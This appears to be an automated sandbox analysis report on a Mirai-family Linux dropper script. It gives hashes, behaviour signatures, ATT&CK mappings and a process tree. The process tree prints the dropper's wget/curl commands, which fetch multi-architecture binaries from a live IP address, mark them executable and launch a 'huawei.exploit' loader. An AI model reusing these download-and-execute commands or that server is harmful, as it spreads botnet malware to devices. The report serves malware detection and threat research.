Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
17-10-2024 07:12
Static task
static1
Behavioral task
behavioral1
Sample
R0I24_na.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
R0I24_na.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
R0I24_na.sh
Resource
debian9-mipsbe-20240418-en
General
-
Target
R0I24_na.sh
-
Size
4KB
-
MD5
d97f217a1dad90ac2a811c2684010888
-
SHA1
7aedac430643630d8d80e361279e85bf4a583679
-
SHA256
81a013dd15f6f42dc9b2f72ebfc7b5ecbc3be11b6e7777618bc500fa910102f3
-
SHA512
a98fe8d2822b641beaa27829c6e393974f666bdc502e459ed0e4e27f1213178fe92938960edcf81d4bcc30f7c0aec157dc353f34fb2652bff4c6a75996ac337f
-
SSDEEP
96:vNVjkNw4tNx/oNN7sNdMdEpF7Nn9qNUsBN2mnNRf4N3tiNueXNySjNGWvNPl9:GO4Fk
Malware Config
Extracted
mirai
UNSTABLE
Signatures
-
Contacts a large (190333) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 7 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 677 chmod 692 chmod 709 chmod 728 chmod 752 chmod 791 chmod 796 chmod -
Executes dropped EXE 7 IoCs
ioc pid Process /tmp/load.sh 678 load.sh /tmp/load.sh 693 load.sh /tmp/load.sh 710 load.sh /tmp/load.sh 730 load.sh /tmp/load.sh 753 load.sh /tmp/load.sh 792 load.sh /tmp/load.sh 797 load.sh -
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog load.sh File opened for modification /dev/misc/watchdog load.sh File opened for modification /dev/watchdog load.sh File opened for modification /dev/misc/watchdog load.sh -
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp load.sh -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 4 IoCs
description ioc Process File opened for modification /sbin/watchdog load.sh File opened for modification /bin/watchdog load.sh File opened for modification /sbin/watchdog load.sh File opened for modification /bin/watchdog load.sh -
resource yara_rule behavioral2/files/fstream-1.dat upx behavioral2/files/fstream-4.dat upx behavioral2/files/fstream-5.dat upx behavioral2/files/fstream-6.dat upx behavioral2/files/fstream-7.dat upx behavioral2/files/fstream-8.dat upx -
Changes its process name 2 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself a 730 load.sh Changes the process name, possibly in an attempt to hide itself a 797 load.sh -
Checks CPU configuration 1 TTPs 7 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp load.sh -
description ioc Process File opened for reading /proc/591/cmdline load.sh File opened for reading /proc/807/cmdline load.sh File opened for reading /proc/824/cmdline load.sh File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/exe load.sh File opened for reading /proc/736/cmdline load.sh File opened for reading /proc/741/cmdline load.sh File opened for reading /proc/self/auxv curl File opened for reading /proc/734/cmdline load.sh File opened for reading /proc/652/cmdline load.sh File opened for reading /proc/self/exe load.sh File opened for reading /proc/649/cmdline load.sh File opened for reading /proc/799/cmdline load.sh File opened for reading /proc/self/exe load.sh File opened for reading /proc/649/cmdline load.sh File opened for reading /proc/599/cmdline load.sh File opened for reading /proc/737/cmdline load.sh File opened for reading /proc/587/cmdline load.sh File opened for reading /proc/599/cmdline load.sh File opened for reading /proc/828/cmdline load.sh File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/exe load.sh File opened for reading /proc/802/cmdline load.sh File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/648/cmdline load.sh File opened for reading /proc/600/cmdline load.sh File opened for reading /proc/727/cmdline load.sh File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/779/cmdline load.sh File opened for reading /proc/self/auxv curl File opened for reading /proc/647/cmdline load.sh File opened for reading /proc/647/cmdline load.sh File opened for reading /proc/804/cmdline load.sh File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/759/cmdline load.sh File opened for reading /proc/652/cmdline load.sh File opened for reading /proc/803/cmdline load.sh File opened for reading /proc/826/cmdline load.sh File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/735/cmdline load.sh File opened for reading /proc/646/cmdline load.sh File opened for reading /proc/822/cmdline load.sh File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/600/cmdline load.sh File opened for reading /proc/758/cmdline load.sh File opened for reading /proc/812/cmdline load.sh File opened for reading /proc/818/cmdline load.sh File opened for reading /proc/self/auxv curl File opened for reading /proc/594/cmdline load.sh File opened for reading /proc/820/cmdline load.sh File opened for reading /proc/834/cmdline load.sh File opened for reading /proc/self/auxv curl File opened for reading /proc/587/cmdline load.sh File opened for reading /proc/830/cmdline load.sh File opened for reading /proc/832/cmdline load.sh File opened for reading /proc/646/cmdline load.sh File opened for reading /proc/814/cmdline load.sh File opened for reading /proc/594/cmdline load.sh File opened for reading /proc/816/cmdline load.sh File opened for reading /proc/591/cmdline load.sh File opened for reading /proc/638/cmdline load.sh File opened for reading /proc/801/cmdline load.sh -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 681 wget 684 curl 690 cat -
Writes file to tmp directory 16 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.x86 curl File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.arm5 curl File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.arm6 curl File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.arm7 wget File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.ppc wget File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.arm curl File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.arm7 curl File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.x86 wget File opened for modification /tmp/load.sh R0I24_na.sh File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.mips curl File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.mpsl wget File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.arm6 wget File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.mips wget File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.mpsl curl File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.arm wget File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.arm5 wget
Processes
-
/tmp/R0I24_na.sh/tmp/R0I24_na.sh1⤵
- Writes file to tmp directory
PID:649 -
/usr/bin/wgetwget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x862⤵
- Writes file to tmp directory
PID:651
-
-
/usr/bin/curlcurl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:665
-
-
/bin/catcat db0fa4b8db0333367e9bda3ab68b8042.x862⤵PID:676
-
-
/bin/chmodchmod +x db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh R0I24_na.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-EiKwg92⤵
- File and Directory Permissions Modification
PID:677
-
-
/tmp/load.sh./load.sh huawei.exploit2⤵
- Executes dropped EXE
PID:678
-
-
/usr/bin/wgetwget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:681
-
-
/usr/bin/curlcurl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:684
-
-
/bin/catcat db0fa4b8db0333367e9bda3ab68b8042.mips2⤵
- System Network Configuration Discovery
PID:690
-
-
/bin/chmodchmod +x db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh R0I24_na.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-EiKwg92⤵
- File and Directory Permissions Modification
PID:692
-
-
/tmp/load.sh./load.sh huawei.exploit2⤵
- Executes dropped EXE
PID:693
-
-
/usr/bin/wgetwget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl2⤵
- Writes file to tmp directory
PID:696
-
-
/usr/bin/curlcurl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:701
-
-
/bin/catcat db0fa4b8db0333367e9bda3ab68b8042.mpsl2⤵PID:707
-
-
/bin/chmodchmod +x db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh R0I24_na.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-EiKwg92⤵
- File and Directory Permissions Modification
PID:709
-
-
/tmp/load.sh./load.sh huawei.exploit2⤵
- Executes dropped EXE
PID:710
-
-
/usr/bin/wgetwget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm2⤵
- Writes file to tmp directory
PID:713
-
-
/usr/bin/curlcurl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:718
-
-
/bin/catcat db0fa4b8db0333367e9bda3ab68b8042.arm2⤵PID:725
-
-
/bin/chmodchmod +x db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh R0I24_na.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-EiKwg92⤵
- File and Directory Permissions Modification
PID:728
-
-
/tmp/load.sh./load.sh huawei.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
- Reads runtime system information
PID:730
-
-
/usr/bin/wgetwget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm52⤵
- Writes file to tmp directory
PID:732
-
-
/usr/bin/curlcurl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/catcat db0fa4b8db0333367e9bda3ab68b8042.arm52⤵PID:751
-
-
/bin/chmodchmod +x db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh R0I24_na.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-EiKwg92⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/load.sh./load.sh huawei.exploit2⤵
- Executes dropped EXE
- Reads runtime system information
PID:753
-
-
/usr/bin/wgetwget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm62⤵
- Writes file to tmp directory
PID:755
-
-
/usr/bin/curlcurl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:759
-
-
/bin/catcat db0fa4b8db0333367e9bda3ab68b8042.arm62⤵PID:790
-
-
/bin/chmodchmod +x db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh R0I24_na.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-EiKwg92⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/load.sh./load.sh huawei.exploit2⤵
- Executes dropped EXE
- Reads runtime system information
PID:792
-
-
/usr/bin/wgetwget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm72⤵
- Writes file to tmp directory
PID:793
-
-
/usr/bin/curlcurl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:794
-
-
/bin/catcat db0fa4b8db0333367e9bda3ab68b8042.arm72⤵PID:795
-
-
/bin/chmodchmod +x db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh R0I24_na.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-EiKwg92⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/load.sh./load.sh huawei.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:797
-
-
/usr/bin/wgetwget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc2⤵
- Writes file to tmp directory
PID:799
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
33KB
MD56d1b6e91b1e2037fbf62ca7ddcf04932
SHA1d0769095ec2e678074eb206b3537022129c1a776
SHA2567f307860b88d639313ebd4195f1ef6a8d668d1941c6cbf6dc968961b1fe42782
SHA5127397ef3b4f7d34b0637de721f38ac833ad6d526e9b7cdbc08fdb4b261fa675001a8079ff4b9378fa219090a945126832cb1ab3db86b35da0090b20051d31bb38
-
Filesize
35KB
MD5fd5d7deebbb62aee931a1701a1042450
SHA14adc94ce9de13647815a16d6514b73e109c80785
SHA2567a36bd7a9d19b6d48807264712141dd0543ffebd9db923a76799ffd687f352c9
SHA512cb7beeb8d88ad48ac447b69b215738cdf1d706cb88c4945d0a0837c07dfe41a74107f9c4d7fccc5c7e5719ee9a912452ba3c53c360252bd46978f5d27c1b6df4
-
Filesize
37KB
MD5144cc0c6dfb6f6e395065b02825a9ad1
SHA1dfe5d7d8bef4511b42be1ae0235f7469d97bf789
SHA256117cd63b79b8c0d3753ac6907206872d6527c2d6a641776c1021302d5dcec2b2
SHA5129e5ca9ee3ebef09688d74de6bb4af9d6c1003173ee5846cd2370d4774e9bc92fef317113b19529cd2a5b1d18a38a626ebf6ed2da05e6c7b66e0d1b69d8ddc5d5
-
Filesize
34KB
MD5b478298246ee6d313f4f576d0f7ec4cd
SHA194d25c6d4cfb1e218120d378d14c8d5ab868363b
SHA256ed04f35cc6c4bef7ea8bf398436da916ebfab2490c10bd1d59df70f648e80df5
SHA51283f67116e5c7074dcfa0e98d94697a0db2bdcaed15060aa31ed6a20eb543fd1d10d8fe26856178f78cc7402531de358e4b6c1d294086b18ab891d23954e78307
-
Filesize
30KB
MD5d8893525da7152c787dcc7d6309a61ba
SHA187fa7fb894caaa77a9caa7bca6a5fd3fbe09f7cd
SHA2562a1b03ac26cc72118fb419de4bee3352adf536ee4d5472e8cee14150ca53b8ef
SHA5128fcf808c627c080350adcf005df853a6c1f3fb3e3b2b5d2745a972dcc4064ff731f7cebbbd7d4e8c9ade91727f587356f844b783fa6c90a2191b80a38ca1f6e6
-
Filesize
58KB
MD57324dbeb098c782561c906ebab3ee1ea
SHA1e6f5ea8561a51cd096aeb2e10a98e17199e399f8
SHA256730859ff16c34d990ddd18509a1a3c22a9b582944fc68e6411f9895b79239895
SHA512c5f519317a58b39d44af0c137a1f3cc8634a1306602e210f342e560ac68fba3fef05628b1058617e0673e104a1d06da98a74f2ac0817830146a0f955a5474f4d